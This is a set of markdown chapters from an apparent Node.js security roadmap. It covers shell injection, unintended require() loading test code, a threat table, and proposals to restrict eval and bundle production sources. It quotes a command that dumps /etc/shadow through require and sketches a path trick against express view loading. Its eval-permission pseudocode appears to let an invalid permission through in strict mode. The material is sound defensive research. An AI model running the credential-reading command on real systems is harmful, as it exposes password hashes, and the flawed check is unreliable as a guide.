[Yosuke]: https://news.ycombinator.com/item?id=4370098
[Masato]: https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html
[obfusc]: https://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049
[JSR 223]: https://docs.oracle.com/javase/8/docs/technotes/guides/scripting/prog_guide/api.html
[dynjava]: https://www.ibm.com/developerworks/library/j-jcomp/index.html


================================================
FILE: chapter-1/threat-SHP.md
================================================
# Shell Injection during Production

[Shell injection][] occurs when an attacker-controlled string changes
the structure of a command passed to a shell or causes a child process
to execute an unintended command or with unintended arguments.
Typically, this is because code or a dependency invokes
[child\_process][api/child_process] with an argument partially
composed from untrusted inputs.

Shell injection may also occur during development and deployment.  For
example, [npm][npm hooks] and [Bower][bower hooks]
`{pre-,,post-}install` hooks may be subject to shell injection via
filenames that contain shell meta-characters in malicious transitive
dependencies but we classify this as an [MTP][] vulnerability.

[MTP]: threat-MTP.md
[npm hooks]: https://docs.npmjs.com/misc/scripts
[bower hooks]: https://bower.io/docs/config/#hooks
[Shell injection]: http://cwe.mitre.org/data/definitions/77.html
[api/child_process]: https://nodejs.org/api/child_process.html


================================================
FILE: chapter-1/threat-UIR.md
================================================
# Unintended Require

If an attacker controls the `x` in `require(x)` then they can cause
code to load that was not intended to run on the server.

Our high-level, informal security argument for web applications looks
like:

1.  All code producing content for, and loaded into *example.com*
    is written or vetted by developers employed by *example.com*.
2.  Those developers have the tools and support to do a good job, and
    organizational measures filter out those unwilling or unable to
    do a good job.
3.  Browsers enforce the same origin policy, so *example.com*'s code
    can make sure all access by third parties to data held on behalf
    of end users goes through *example.com*'s servers where
    authorization checks happen.
4.  Therefore, end users can make informed decisions about the degree
    of trust they extend to *example.com*.

Even if the first two premises are true, but production servers load
code that wasn't intended to run in production, then the conclusion
does not follow.  Developers do not vet test code the same way they
do production code and ought not have to.

This vulnerability may be novel to CommonJS-based module linking
(though we are not the first to report it ([details][prior art])) so we
discuss it in more depth than other classes of vulnerability.  Our
frequency and severity guesstimates have a high level of uncertainty.


## Dynamic `require()` can load non-production code

`require` only loads from the file-system under normal configurations
even though [CommonJS][modules spec] leaves "unspecified
whether modules are stored with a database, file system, or factory
functions, or are interchangeable with link libraries."

Even though, as-shipped, `require` only loads from the file-system, a
common practice of copying `node_modules` to the server makes
unintended require a more severe problem than one might expect.  Test
code often defines mini APIs that intentionally disable or circumvent
production checks, so causing test code to load in production can make
it much easier to escalate privileges or turn a limited code execution
vulnerability into an arbitrary code execution vulnerabilities.


## Availability of non-production code in `node_modules`

There are many modules `$m` such that `npm install "$m"` places test
or example files under `node_modules/$m`.

[Experiments](../appendix/experiments.md#test_code) show that, of the
top 108 most commonly used modules, 50 (46.30%) include test or
example code.  Some of these modules, like `mocha`, are most
often loaded as dev dependencies, but `npm install --only=prod`
will still produce a `node_modules` directory that has test and
example code for most projects.


## Non-production code differs from production code.

We need to keep test code from loading in production.

Good developers do and should be able to do things in test code that
would be terrible ideas in production code.  It is not uncommon to
find test code that:

-  changes global configuration so that they can run tests under
   multiple different configurations.
-  defines methods that intentionally break abstractions so they
   can test how gracefully production code deals with marginal inputs.
-  parses test cases specified in strings and pass parts onto powerful
   reflective operators and `eval`-like operators.
-  `require`s modules specified in test case strings so they can
   run test cases in the context of plugins.
-  breaks private/public API distinctions to better interrogate
   internals.
-  disables security checks so they can test how gracefully
   a subcomponent handles dodgy inputs.
-  calls directly into lower-level APIs that assume that higher
   layers checked inputs and enforced access controls.
-  includes in output sensitive internal state (like PRNG seeds) to
   aid a developer in reproducing or tracking down the root cause of
   a test failure.
-  logs or include in output information that would be sensitive
   if the code connected to real user data instead of a test database.
-  resets PRNG seeds to fixed values to make it easier to reproduce
   test failures.
-  adds additional "God mode" request handlers that allow a developer
   to interactively debug a test server.

These are not security problems when test environments neither access
real user data nor receive untrusted inputs.

## Unintended Require can activate non-production code

The primary vector for this vulnerability is dynamic code loading:
calling `require(...)` with an argument other than a literal string.

To assess the severity of this issue, we [examined](../appendix/experiments.md)
the 108 most popular npm modules.

34 of the top 108 most popular npm modules (30%) call `require(...)`
without a literal string argument or have a non-test dependency that
does.  This is after imperfect heuristics to filter out non-production
code.  If we assume, conservatively, that uses of `require` that are
not immediate calls are dynamic load vectors, then the proportion
rises to 50%.  See [appendix](../appendix/experiments.md#dynamic_load).

Below are the results of a manual human review of dynamic loads in
popular npm modules.  There seem to be few clear vulnerabilities among
the top 108 modules, but the kind of reasoning required to check this
is not automatable; note the use of phrases like "developers probably
won't" and "the module is typically used to".

Determining which dynamic loads are safe among the long tail of less
widely used modules would be difficult.

----

Some dynamic loads are safe.  Jade, a deprecated version of PugJS, does

```js
function getMarkdownImplementation() {
  var implementations = ['marked', 'supermarked',
                         'markdown-js', 'markdown'];
  while (implementations.length) {
    try {
      require(implementations[0]);
```

This is not vulnerable.  It tries to satisfy a dependency by
iteratively loading alternatives until it finds one that is available.

Babel-core v6's file transformation module ([code][babel-core dyn load])
loads plugins thus:

```js
var parser = (0, _resolve2.default)(parserOpts.parser, dirname);
if (parser) {
  parseCode = require(parser).parse;
```

This looks in an options object for a module identifier.  It's
unlikely that this particular code in babel is exploitable since
developers probably won't let untrusted inputs specify parser options.

The popular colors module ([code][colors dyn load]) treats the argument
to `setTheme` as a module identifier.

```js
colors.setTheme = function (theme) {
  if (typeof theme === 'string') {
    try {
      colors.themes[theme] = require(theme);
```

This is unlikely to be a problem since the module is typically used to
colorize console output.  HTTP response handling code will probably
not load `colors` so an untrusted input will probably not reach
`colors.setTheme`.
If an attacker can control the argument to `setTheme` then they can
load an arbitrary JavaScript source file or C++ addon.

The popular browserlist module ([code][browserlist dyn load]) takes
part of a query string and treats it as a module name:

```js
  {
    regexp: /^extends (.+)$/i,
    select: function (context, name) {
      if (!context.dangerousExtend) checkExtend(name)
      // eslint-disable-next-line security/detect-non-literal-require
      var queries = require(name)
```

Hopefully browser list queries are not specified by untrusted inputs, but
if they are, an attacker can load arbitrary available source files since
`/(.+)$/` will match any module identifier.

The popular express framework loads file-extension-specific code
as needed.  If express views are lazily initialized based on a portion
of the request path without first checking that the path should have a
view associated, then the following runs ([code][express dyn load]):

```js
if (!opts.engines[this.ext]) {
  // load engine
  var mod = this.ext.substr(1)
  debug('require "%s"', mod)

  // default engine export
  var fn = require(mod).__express
```

This would seem to allow loading top-level modules by requesting a
view name like `foo.toplevelmodule`, though not local source files
whose identifiers must contain `.` and `/`.  Loading top-level modules
does not, by itself, allow loading non-production code, so this is
probably not vulnerable to this attack.  It may be possible to use a
path like `/base.\foo\bar` to cause `mod = "\\foo\\bar"` which may
allow arbitrary source files on Windows, but it would only allow
loading the module for initialization side effects unless it
coincidentally provides significant abusable authority under
`exports.__express`.

----

This analysis suggests that the potential for exploiting unintended
require is low in projects that only use the 100 most popular modules,
but the number and variety of dynamic `require()` calls in the top 108
modules suggests potential for exploitable cases in the top 1000
modules, and we know of no way to automatically vet modules for UIR
vulnerabilities.

## Unintended require can leak information

[Fernando Arnaboldi][diff fuzz] showed that unintended requires can
leak sensitive information if attackers have access to error messages.

> ```sh
> # node -e
> "console.log(require('/etc/shadow'))"
> ```
>
> ...
>
> The previous example exposes the first line of
> /etc/shadow, which contains the encrypted root password.

See also [exfiltration][EXF].


[babel-core dyn load]: https://github.com/babel/babel/blob/cb8c4172ef740aa562f0873d602d800c55e80c6d/packages/babel-core/src/transformation/file/index.js#L421-L424
[colors dyn load]: https://github.com/Marak/colors.js/blob/9f3ace44700b8e705cb15be4767845c311b3ae11/lib/colors.js#L135-L138
[browserlist dyn load]: https://github.com/ai/browserslist/blob/3e7ed2431d781ce0ff7eade1e2b24780c592b50e/index.js#L776-L780
[express dyn load]: https://github.com/expressjs/express/blob/351396f971280ab79faddcf9782ea50f4e88358d/lib/view.js#L81
[prior art]: https://github.com/nodesecurity/eslint-plugin-security/blob/master/README.md#detect-non-literal-require
[diff fuzz]: https://www.blackhat.com/docs/eu-17/materials/eu-17-Arnaboldi-Exposing-Hidden-Exploitable-Behaviors-In-Programming-Languages-Using-Differential-Fuzzing-wp.pdf
[EXF]: threat-EXF.md
[modules spec]: http://wiki.commonjs.org/wiki/Modules/1.1


================================================
FILE: chapter-1/threats.md
================================================
# Threat environment

The threat environment for Node.js is similar to that for other runtimes that
are primarily used for microservices and web frontends, but there are some
Node.js specific concerns.

We define both kinds of threats in this section.  A reader familiar with
web-application security can skip all but this page and the discussion
of [*unintended require*][UIR] without missing much, but may find it
helpful to refer back to the table below when reading later chapters.

## Server vs Client-side JavaScript

Before we discuss the threat environment, it's worth noting that the threat
environment for server-side JavaScript is quite different from that for
client-side JavaScript.  For example,

* Client-side JavaScript runs in the context of the
  [same-origin policy][] possibly with a
  [Content-Security-Policy][CSP] which governs which code can load.
  Server-side JavaScript **code loading** is typically only
  constrained by the files on the server, and the values that can
  reach `require(...)`, `eval(...)` and similar operators.
* Client-side JavaScript typically only has access to data that the
  human using the browser should have access to.  On the server,
  applications are responsible for **data [compartmentalization][]**,
  and server-side JavaScript often has privileged access to storage
  systems and other backends.
* **File-system access** by the client typically either requires human
  interaction
  (`<input type=file>`, `Content-disposition:attachment`), or can only access
  a directory dedicated to third-party content (browser cache, local storage)
  and which is not usually on a list like `$PATH`.
  On the server, the Node runtime process's privileges determine
  [file-system access][nodejs/fs].
* Client-side JavaScript has no concept of a **shell** that converts
  strings into commands that runs outside the JavaScript engine.
  Server-side JavaScript can spawn
  [child processes][nodejs/child_process] that operate on data
  received over the network, and on data that is accessible to the
  Node runtime process.
* **Network messages** sent by server-side JavaScript originate inside
  the server's LAN, but those sent by client-side JavaScript typically do not.
* **Shared memory concurrency** in client-side JavaScript happens via
  well-understood APIs like `SharedArrayBuffer`.  Experimental modules
  ([code][threads-a-gogo]) and a [workers proposal][]
  allow server-side JavaScript to fork threads; it is
  unclear how widespread these are in production or how
  [susceptible][thread corner cases] these are to memory corruption
  or exploitable race conditions.
* Client-side, the browser halts all scripts in a document when a
  single event loop cycle **runs too long**.
  Node.js has few ways to manage runaway computations on the server.

The threat environment for server-side JavaScript is much closer to
that for any other server-side framework than JavaScript in the
browser.

## Classes of Threats {#threat_table}

The table below lists broad classes of vulnerabilities, and for each,
a short identifier by which we refer to the class later in this
document.  This list is not meant to be comprehensive, but we expect
that a thorough security assessment would touch on most of these and
would have low confidence in an assessment that skips many.

The frequency and severity of vulnerabilities are guesstimates since
we have little hard data on the frequency of these in Node.js
applications, so have extrapolated from similar systems.  For example,
see discussion about frequency in [buffer overflow][BOF].

For each, relevant mitigation strategies appear in the mitigations
columns, and link to the discussion.

| Shorthand | Description                                                                           | Frequency | Severity | Mitigations                 |
| --------- | ------------------------------------------------------------------------------------- | --------- | -------- | --------------------------- |
| [0DY][]   | Zero-day.  Attackers exploit a vulnerability before a fix is available.               | Low-Med   | Med-High | [cdeps][m-cd] [fail][m-fa]  |
| [BOF][]   | Buffer overflow.                                                                      | Low       | High     | [ovrsi][m-os]               |
| [CRY][]   | Misuse of crypto leads to poor access-control decisions or data leaks.                | Medium    | Medium   | [ovrsi][m-os]               |
| [DEX][]   | Poor developer experience slows or prevents release of features.                      | ?         | ?        | [dynam][m-dy] [ovrsi][m-os] |
| [DOS][]   | Denial of service                                                                     | Medium    | Low-Med  | TBD                         |
| [EXF][]   | Exfiltration of data, e.g. by exploiting reflection to serialize more than intended.  | Med-High  | Low-Med  | [ovrsi][m-os]               |
| [LQC][]   | Using low quality dependencies leads to exploit                                       | Medium    | Low-Med  | [kdeps][m-kd] [ovrsi][m-os] |
| [MTP][]   | Theft of commit rights or MITM causes `npm install` to fetch malicious code.          | Low       | Med-High | [kdeps][m-kd] [cdeps][m-cd] |
| [QUI][]   | Query injection on a production machine.                                              | Medium    | Med-High | [ovrsi][m-os] [qlang][m-ql] |
| [RCE][]   | Remote code execution, e.g. via `eval`                                                | Med-High  | High     | [dynam][m-dy] [ovrsi][m-os] |
| [SHP][]   | Shell injection on a production machine.                                              | Low       | High     | [ovrsi][m-os] [cproc][m-cp] |
| [UIR][]   | `require(untrustworthyInput)` loads code not intended for production.                 | Low       | Low-High | [dynam][m-dy]               |


## Meltdown and Spectre

As of this writing, the security community is trying to digest
the implications of *Meltdown* and *Spectre*.  The
[Node.js blog][Meltdown Spectre Impact] addresses them from a
Node.js perspective, so we do not comment in depth.

It is worth noting though that those vulnerabilities lead to
breaches of *confidentiality*.  While confidentiality violations
are serious, the suggestions that follow use design principles
that prevent a violation of confidentiality from causing a
violation of *integrity*.  Specifically:

*  Knowing a whitelist of production source hashes does not
   allow an attacker to cause a non-production source to load.
*  Our runtime `eval` mitigation relies on JavaScript reference
   equality, not knowledge of a secret.


[same-origin policy]: https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
[CSP]: https://developers.google.com/web/fundamentals/security/csp/
[compartmentalization]: https://cwe.mitre.org/data/definitions/653.html
[nodejs/fs]: https://nodejs.org/api/fs.html
[nodejs/child_process]: https://nodejs.org/api/child_process.html
[threads-a-gogo]: https://github.com/xk/node-threads-a-gogo/blob/74005641d53b0d85e8d75e2506eddbded15f5112/src/threads_a_gogo.cc#L1387
[workers proposal]: https://github.com/nodejs/worker/issues/2
[thread corner cases]: https://github.com/nodejs/worker/issues/4#issuecomment-306090967
[Query Injection]: https://cwe.mitre.org/data/definitions/89.html
[0DY]: threat-0DY.md
[BOF]: threat-BOF.md
[CRY]: threat-CRY.md
[DEX]: threat-DEX.md
[DOS]: threat-DOS.md
[EXF]: threat-EXF.md
[LQC]: threat-LQC.md
[MTP]: threat-MTP.md
[QUI]: threat-QUI.md
[RCE]: threat-RCE.md
[SHP]: threat-SHP.md
[UIR]: threat-UIR.md
[m-dy]: ../chapter-2/dynamism.md
[m-kd]: ../chapter-3/knowing_dependencies.md
[m-cd]: ../chapter-4/close_dependencies.md
[m-os]: ../chapter-5/oversight.md
[m-fa]: ../chapter-6/failing.md
[m-cp]: ../chapter-7/child-processes.md
[m-ql]: ../chapter-7/query-langs.md
[Meltdown Spectre Impact]: https://nodejs.org/en/blog/vulnerability/jan-2018-spectre-meltdown/


================================================
FILE: chapter-2/bounded-eval.md
================================================
# Dynamically bounding `eval`

If we could provide an API that was available statically, but not dynamically
we could double-check uses of `eval` operators.

```js
// API for allowing some eval
var prettyPlease = require('prettyPlease');
// Carefully reviewed JavaScript generating code
var codeGenerator = require('codeGenerator');

let compile;

prettyPlease.mayI(
    module,
    (evalPermission) => {
      compile = function (source) {
        const js = codeGenerator.generateCode(source);
        return prettyPlease.letMeEval(
            evalPermission,
            js,
            () => ((0, eval)(js)));
      };
    });

exports.compile = compile;
```

The `prettyPlease` module cannot be pure JavaScript since only the
C++ linker can take advantage of *CodeGeneration* callbacks
([code][CodeGeneration callbacks]) the way CSP does
([code][CSP callback]) on the client, but the definition would be
roughly:

```js
// prettyPlease module
(() => {
  const _PERMISSIVE_MODE = 0;  // Default
  const _STRICT_MODE = 1;
  const _REPORT_ONLY_MODE = 2;

  const _MODE = /* From command line arguments */;
  const _WHITELIST = new Set(/* From command line arguments */);

  const _VALID_PERMISSIONS = new WeakSet();
  const _EVALABLE_SOURCES = new Map();

  if (_MODE !== _PERMISSIVE_MODE) {
    // Pseudocode: the code-generation callback installed when the
    // JavaScript engine is initialized.
    function codeGenerationCheckCallback(context, source) {
      // source must be a v8::Local<v8::string> or ChakraCore equivalent
      // so no risk of polymorphing
      if (_EVALABLE_SOURCES.has(source)) {
        return true;
      }
      console.warn(...);
      return _MODE == _REPORT_ONLY_MODE;
    }
  }

  // requestor -- the `module` value in the scope of the code requesting
  //      permissions.
  // callback -- called with the generated permission whether granted or
  //      not.  This puts the permission in a parameter name making it
  //      much less likely that an attacker who controls a key to obj[key]
  //      can steal it.
  module.mayI = function (requestor, callback) {
    const id = String(requestor.id);
    const filename = String(requestor.filename);
    const permission = Object.create(null);  // Token used for identity
    // TODO: Needs privileged access to real module cache so a module
    // can't masquerade as another by mutating the module cache.
    if (_MODE !== _PERMISSIVE_MODE
        && requestor === require.cache[filename]
        && _WHITELIST.has(id)) {
      _VALID_PERMISSIONS.add(permission);
      // Typical usage is to request permission once during module load.
      // Removing from whitelist prevents later bogus requests after
      // the module is exposed to untrusted inputs.
      _WHITELIST.delete(id);
    }
    return callback(permission);
  };

  // permission -- a value received via mayI
  // sourceToEval -- code to eval.  The code generation callback will
  //                 expect this exact string as its source.
  // codeThatEvals -- a callback that will be called in a scope that
  //                  allows eval of sourceToEval.
  module.letMeEval = function (permission, sourceToEval, codeThatEvals) {
    sourceToEval = String(sourceToEval);
    if (_MODE === _PERMISSIVE_MODE) {
      return codeThatEvals();
    }

    if (!_VALID_PERMISSIONS.has(permission)) {
      console.warn(...);
      if (_MODE !== _REPORT_ONLY_MODE) {
        return codeThatEvals();
      }
    }

    const countBefore = _EVALABLE_SOURCES.get(sourceToEval) || 0;
    _EVALABLE_SOURCES.set(sourceToEval, countBefore + 1);
    try {
      return codeThatEvals();
    } finally {
      if (countBefore) {
        _EVALABLE_SOURCES.set(sourceToEval, countBefore);
      } else {
        _EVALABLE_SOURCES.delete(sourceToEval);
      }
    }
  };
})();
```

and the `eval` operators would check that their argument is in the global
set.

Implicit access to `eval` is possible because reflective operators can
reach `eval`.  As long as we can prevent reflective access to
`evalPermissions` we can constrain what can be `eval`ed.  If
`evalPermission` is a function parameter, then only `arguments`
aliases it, so functions that do not mention the special name
`arguments` may safely receive one.  Most functions do not mention
`arguments`.  Before whitelisting a module, a reviewer would be wise
to check for any use of `arguments`, and for any escape of permissions
or `module`.

`evalPermission` is an opaque token &mdash; only its reference identity
is significant, so we can check membership in a `WeakSet` without
risk of forgery.

This requires API changes to existing modules that dynamically use
`eval`, but the changes should be additive and straightforward.

It also allows project teams and security specialists to decide on
a case-by-case basis, which modules really need dynamic `eval`.

As with synthetic modules, frozen realms may provide a way to further
restrict what dynamically loaded code can do.  If you're trying to
decide whether to trust a module that dynamically loads code, you have
more ways to justifiably conclude that it's safe if the module loads
into a sandbox restricts to a limited frozen API.

[CodeGeneration callbacks]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=626
[CSP callback]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=352


================================================
FILE: chapter-2/bundling.md
================================================
# Dynamic Bundling

Consider a simple Node application:

```js
// index.js
// Example that uses various require(...) use cases.

let staticLoad = require('./lib/static');
function dynamicLoad(f, x) {
  return f('./lib/' + x);
}
dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
exports.lazyLoad = () => require('./lib/lazy');

// Fallback to alternatives
require(['./lib/opt1', './lib/opt2'].find(
    (name) => {
      try {
        require.resolve(name);
        return true;
      } catch (_) {
        return false;
      }
    }));
```

with some unit tests:

```js
// test/test.js

var expect = require("chai").expect;
var app = require("../index");

describe("My TestSuite", () => {
  describe("A test", () => {
    it("A unittest", () => {
      // Exercise the API
      app.lazyLoad();
    });
  });
});
```

We hack `updateChildren`, which gets called by `Module._load` for new
modules and when a module requires a cached module, to dump information
about loads:

```diff
diff --git a/lib/module.js b/lib/module.js
index cc8d5097bb..945ab8a4a8 100644
--- a/lib/module.js
+++ b/lib/module.js
@@ -59,8 +59,18 @@ stat.cache = null;

 function updateChildren(parent, child, scan) {
   var children = parent && parent.children;
-  if (children && !(scan && children.includes(child)))
+  if (children && !(scan && children.includes(child))) {
+    if (parent.filename && child.id) {
+      // HACK: rather than require('fs') to write a file out, we
+      // log to the console.
+      // We assume the prefix will be removed and the result wrapped in
+      // a DOT digraph.
+      console.log(
+          'REQUIRE_LOG_DOT:    ' + JSON.stringify(parent.filename)
+          + ' -> ' + JSON.stringify(child.id) + ';');
+    }
     children.push(child);
+  }
 }
```

Running the tests and extracting the graph ([code][extract-script])
gives us a rather [hairy dependency graph](example/graphs/full.svg):

<img title="Files loaded by `npm test`" src="example/graphs/full.svg" width=800 height=100>

We add an edge from `"./package.json"` to the module's main file.
Then we filter edges ([code][graph-filter]) to include only those
reachable from `"./package.json"`.  This lets us distinguish files
loaded by the test runner and tests from those loaded after control
has entered an API in a production file.

The resulting graph is much simpler:

![Production Source Files](example/graphs/filtered.svg)

Note that the production file list includes dynamically and lazily
loaded files.  It does include `./lib/opt2.js` but not `./lib/opt1.js`.
The former file does not exist, so the loop which picks the first
available alternative tries and finds the latter.

Our production source list should include all the files we need
in production if

*  The unit tests `require` the main file
*  The unit tests have enough coverage to load all modules required
   in production via APIs defined in the main file or in APIs
   transitively loaded from there.

It is definitely possible to miss some files.  If the unit test did
not call `app.lazyLoad` then there would be no edge to
`./lib/lazy.js`.  To address this, developers can

*  Expand test coverage to exercise code paths that load the
   missing source files.
*  Or add an explicit whitelist like
   ```js
   // production-source-whitelist.js
   require('./index.js');
   require('./lib/lazy.js');
   ```
   and explicitly pass this as the main file to the filter
   instead of defaulting to the one specified in `package.json`.

Dynamic analysis is not perfect, but a missing source file is
readily apparent, so this replaces

*  hard-to-detect bugs with potentially severe security consequences,

with

*  easy-to-detect bugs with negligible security consequences.

[extract-script]: https://github.com/google/node-sec-roadmap/blob/master/chapter-2/example/make_dep_graph.sh
[graph-filter]: https://github.com/google/node-sec-roadmap/blob/6130b76446ff4efbb276d8128c12e41ea2fffbc9/chapter-2/example/make_dep_graph.sh#L39-L73


================================================
FILE: chapter-2/dynamism.md
================================================
# Dynamism when you need it

## Background

Node.js code is composed of CommonJS modules that are linked together
by the builtin `require` function, or [`import`][import-js] statements
(used by [TypeScript][import-ts]) that typically transpile to
`require` (modulo [experimental features][esm]).

`require` itself calls `Module._load` ([code][Module._load]) to
resolve and load code.  ["The Node.js Way"][FKS] explains this flow
well.

Unlike `import`, `require` is dynamic: a runtime value can specify the
name of a module to load.  (The EcmaScript committee is considering a
[dynamic `import` operator][import-op-strawman], but we have
not included that in this analysis.)


This dynamism is powerful and flexible and enables varied use cases
like the following:

*   Lazy loading.  Waiting to load a dependency until it is definitely needed.
    ```js
    const infrequentlyUsedAPI = (function () {
      const dependency = require('dependency');
      return function infrequentlyUsedAPI() {
        // Use dependency
      };
    }());
    ```
*   Loading plugins based on a configuration object.
    ```js
    function Service(config) {
      (config.plugins || []).forEach(
          (pluginName) => {
            require(pluginName).initPlugin(this);
          });
    }
    ```
*   Falling back to an alternate service provider if the first choice
    isn't available:
    ```js
    const KNOWN_SERVICE_PROVIDERS = ['foo-widget', 'bar-widget'];
    const serviceProviderName = KNOWN_SERVICE_PROVIDERS.find(
       (name) => {
         try {
           require.resolve(name);
           return true;
         } catch (_) {
           return false;
         }
       });
    const serviceProvider = require(serviceProviderName);
    ```
*   Taking advantage of an optional dependency when it is available.
    ```js
    let optionalDependency = null;
    try {
      optionalDependency = require('optionalDependency');
    } catch (_) {
      // Oh well.
    }
    ```
*   Loading a handler for a runtime value based on a naming convention.
    ```js
    function handle(request) {
      const handlerName = request.type + '-handler';  // Documented convention
      let handler;
      try {
        handler = require(handlerName);
      } catch (e) {
        throw new Error(
            'Expected handler ' + handlerName
            + ' for requests with type ' + request.type);
      }
      return handler.handle(request);
    }
    ```
*   Introspecting over module metadata.
    ```js
    const version = require('./package.json').version;
    ```

During rapid development, [file-system monitors][nodemon] can restart
a node project when source files change, and the application stitches
itself together without the complex compiler and build system
integration that statically compiled languages use to do incremental
recompilation.


## Problem

Threats: [DEX][] [RCE][] [UIR][]

The `node_modules` directory does not keep production code separate
from test code.  If test code can be `require`d in production, then
an attacker may find it far easier to execute a wide variety of other
attacks.  See [UIR][] for more details on this.

Node applications rely on dynamic uses of `require` and changes that
break any of these use cases would require coordinating large scale
changes to existing code, tools, and development practices threatening
[developer experience][DEX].

Requiring developers to pick and choose which source files are
production and which are test would either:

*  Require them to scrutinize source files not only for their project
   but also for deep dependencies with which they are unfamiliar
   leading to poor developer experience.
*  Whitelist without scrutiny leading to the original security problem.
*  Lead them to not use available modules to solve problems and instead
   roll their own leading to poor developer experience, and possibly
   [LQC][] problems.

We need to ensure that only source code written with production
constraints in mind loads in production without increasing the burden
on developers.

When the behavior of code in production is markedly different from that
on a developer's workstation, developers lose confidence that they
can avoid bugs in production by testing locally which may lead
to poor developer experience and lower quality code.


## Success Criteria

We would have prevented abuse of `require` if:

*  Untrusted inputs could not cause `require` to load a
   non-production source file,
*  and/or no non-production source files are reachable by
   `require`,
*  and/or loading a non-production source file has no adverse effect.

We would have successfully prevented abuse of `eval`, `new Function`
and related operators if:

*  Untrusted inputs cannot reach an `eval` operator,
*  and/or untrusted inputs that reach them cause no adverse affects,
*  and/or security specialists could whitelist uses of `eval` operators
   that are necessary for the functioning of the larger
   system and compatible with the system's security goals.

In both cases, converting dynamic operators to static before untrusted
inputs reach the system reduces the attack surface.  Requiring
large-scale changes to existing npm modules or requiring large scale
rewrites of code that uses using them constitutes compromises [DEX][].


## Current practices

Some development teams use [webpack][] or similar tools to statically
bundle server-side modules, and provide flexible transpilation
pipelines.  That's a great way to do things, but solving security
problems only for teams with development practices mature enough to
deploy via webpack risks preaching to the choir.

Webpack, in its minimal configuration, does not attempt to skip
test files ([code][webpack-experiment]).
Teams with an experienced webpack user can use it to great effect, but
it is not an out-of-the-box solution.

Webpacking does not prevent calls to `require(...)` with unintended
arguments, but greatly reduces the chance that they will load
non-production code.  As long as the server process cannot read
JS files other than those in the bundle, then a webpacked server
is safe from [UIR][].  This may not be the case if the production
machine has npm modules globally installed, and the server process
is not running in a [chroot jail][].


## A Possible Solution

We present one possible solution to demonstrate that tackling this
problem is feasible.

If we can compute the entire set of `require`-able sources when
dealing only with inputs from trusted sources, then we can
ensure that the node runtime only loads those sources even when
exposed to untrusted inputs.

We propose these changes:

*  A two phase approach to prevent abuse of `require`.
   1. Tweaks to the node module loader that make it easy to
      [dynamically bundle](bundling.md) a release candidate.
   2. Tweaks to the node module loader in production to restrict
      code loads based on [source content hashes](source-contents.md)
      from the bundling phase.
*  Two different strategies for preventing abuse of
   [`eval`](what-about-eval.md).
   *  JavaScript idioms that can allow many uses of `eval` to
      [load as modules](synthetic-modules.md) and to bundle as above.
   *  Using JavaScript engine callbacks to
      [allow uses of `eval`](bounded-eval.md) by approved modules.

[DEX]: ../chapter-1/threat-DEX.md
[LQC]: ../chapter-1/threat-LQC.md
[RCE]: ../chapter-1/threat-RCE.md
[UIR]: ../chapter-1/threat-UIR.md
[webpack]: https://webpack.js.org/
[Symbol]: (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol)
[import-js]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import
[import-ts]: https://www.typescriptlang.org/docs/handbook/modules.html#import
[Module._load]: https://github.com/nodejs/node/blob/0fdd88a374e23e1dd4a05d93afd5eb0c3b080fd5/lib/module.js#L449
[FKS]: http://fredkschott.com/post/2014/06/require-and-the-module-system/
[esm]: https://nodejs.org/api/esm.html#esm_ecmascript_modules
[nodemon]: https://nodemon.io/
[import-op-strawman]: https://github.com/tc39/proposal-dynamic-import
[chroot jail]: https://help.ubuntu.com/community/BasicChroot
[webpack-experiment]: https://github.com/google/node-sec-roadmap/tree/master/chapter-2/experiments/webpack-compat


================================================
FILE: chapter-2/example/.gitignore
================================================
node_modules


================================================
FILE: chapter-2/example/graphs/filtered.dot
================================================
digraph Modules {
    "./package.json" [fillcolor=black,fontcolor=white,style=filled];
    "./index.js" -> "./lib/static.js";
    "./index.js" -> "./lib/dynamic.js";
    "./index.js" -> "./lib/opt2.js";
    "./index.js" -> "./lib/lazy.js";
    "./package.json" -> "./index.js";
}


================================================
FILE: chapter-2/example/graphs/full.dot
================================================
digraph Modules {
    "./node_modules/mocha/bin/mocha" -> "./node_modules/mocha/bin/options.js";
    "./node_modules/mocha/bin/_mocha" -> "./node_modules/commander/index.js";
    "./node_modules/mocha/bin/_mocha" -> "./node_modules/mocha/index.js";
    "./node_modules/mocha/index.js" -> "./node_modules/mocha/lib/mocha.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/escape-string-regexp/index.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/reporters/index.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/base.js" -> "./node_modules/diff/lib/index.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/character.js";
    "./node_modules/diff/lib/diff/character.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/word.js";
    "./node_modules/diff/lib/diff/word.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/diff/word.js" -> "./node_modules/diff/lib/util/params.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/line.js";
    "./node_modules/diff/lib/diff/line.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/diff/line.js" -> "./node_modules/diff/lib/util/params.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/sentence.js";
    "./node_modules/diff/lib/diff/sentence.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/css.js";
    "./node_modules/diff/lib/diff/css.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/json.js";
    "./node_modules/diff/lib/diff/json.js" -> "./node_modules/diff/lib/diff/base.js";
